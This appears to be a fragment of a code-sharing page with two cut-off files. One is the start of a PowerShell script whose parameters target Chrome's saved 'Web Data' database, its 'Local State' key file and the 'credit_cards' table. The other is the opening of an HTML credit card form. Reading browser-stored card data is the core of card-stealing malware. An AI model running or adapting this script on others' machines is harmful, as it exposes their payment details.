This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using namespace "System.Security.Cryptography" | |
param ( | |
$DbPath = (Join-path ([environment]::GetFolderPath('UserProfile')) 'AppData\Local\Google\Chrome\User Data\Default\Web Data'), | |
$StatePath = 'C:\Users\Enes\AppData\Local\Google\Chrome\User Data\Local State', | |
$Table = "credit_cards" , | |
$Property = @(@{n='Name'; e={$_.name_on_card}} , | |
@{n='Exp_month';e={$_.expiration_month}}, | |
@{n='Exp_year'; e={$_.expiration_year}}, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<title>Credit card form</title> | |
<style> | |
body { | |
font-family: sans-serif; | |
margin: 0; | |
} |